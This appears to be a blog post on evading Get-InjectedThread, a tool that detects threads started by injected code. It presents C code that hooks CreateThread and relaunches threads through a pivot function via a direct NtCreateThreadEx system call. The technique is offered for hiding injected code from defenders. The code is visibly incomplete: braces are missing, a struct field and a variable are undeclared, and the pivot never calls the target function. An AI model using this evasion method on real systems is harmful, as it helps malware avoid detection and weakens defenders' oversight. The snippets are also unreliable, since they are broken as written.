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Evading Get-InjectedThread using API hooking

Get-InjectedThread is a power shell utility for allowing the user to look through running processes and find threads which seem to be the spawn of code that has been injected in to memory one way or another. How it accomplishes this is by checking running threads to see if their start address is on a page marked as MEM_IMAGE. It does the querying using the VirtualQuery function in kernel32.dll, which itself is a small wrapper around the NtQueryVirtualMemory system call.

For evading this, we simply need to ensure that the start address that gets passed to CreateThread points to a valid MEM_IMAGE mapped area of virtual memory. Now this is easy to do for smaller programs in which you can hand write a shim and use that in place of CreateThread, but this gets a bit harder when the goal is a more general purpose way of side loading.

However there is a fairly simple way around this problem by making use of API hooking and direct systemcalls. As long as the injector and the injected code continue to reside within the same process it is possible for the injector to hook API calls within the process and through that patch CreateThread() to point to a shim function within the injector's virtual memory when the call is made by the injected code. This gives the injected code free reign to call CreateThread while still skirting detection from Get-InjectedThread. The following example code illustrates one way to achieve this:

struct {
	HANDLE *mutex;
	LPVOID lpParamater;
	BOOL launched;
} BouncerInfo;

	BouncerInfo.mutex = CreateMutexA(NULL, FALSE, NULL);
	BouncerInfo.launched = TRUE;

void __stdcall
ThreadPivot(void *param)
	WaitForSingleObject(BouncerInfo.mutex, INFINITE);
	LPTHREAD_START_ROUTINE f = BouncerInfo.lpStartAddress;
	LPVOID p = BouncerInfo.lpParamater;
	BouncerInfo.launched = TRUE;
	printf("[*] Pivoting to passed function\n");

//Function that can be injected over CreateThread from kernel32.dll
HANDLE __stdcall
HookedCreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParamater, DWORD dwCreationFlags, LPDWORD lpThreadId)
	HANDLE ThreadHandle = NULL;
	WaitForSingleObject(BouncerInfo.mutex, INFINITE);
	//It's possible that we get two CreateThread calls before a pivot
	//occurs, this is a bad way of dealing with it but it shouldn't happen often
	while(BouncerInfo.launched == FALSE){
		printf("[!] Double entry detected, spin locking...\n");
		WaitForSingleObject(BouncerInfo.mutex, INFINITE);
	BouncerInfo.lpStartAddress = lpStartAddress;
	BouncerInfo.lpParamater = lpParamater;
	BouncerInfo.launched = FALSE;
	//Direct system call shim function
	res = NtCreateThreadEx10(&ThreadHandle, GENERIC_ALL, NULL, GetCurrentProcess(), ThreadPivot, lpParamater, FALSE, 0, 0, 0, NULL);
	if(res != STATUS_SUCCESS){
		printf("[!] HookedCreateThread error: %lx\n", res);
		return NULL;
	return ThreadHandle;
The code is a bit complex due to the asynchronous nature of CreateThread. We first setup a global struct that will store the last set of arguments that were given to our hook as well as a mutex to lock our variables between our threads. We also use a boolean flag variable within the struct to make sure that a pivot for a given address happens before another call to CreateThread is made and it overwrites the start address. This is needed as control can return to the caller of CreateThread before the new thread has a chance to run, which can result in multiple calls happening before a pivot can be made on the original address.

Doing this will cause new threads to have their start address set to PivotThread which is located in the MEM_IMAGE flagged area of memory from our injector.

For information on hooking and direct system calls I have code snippets for each available.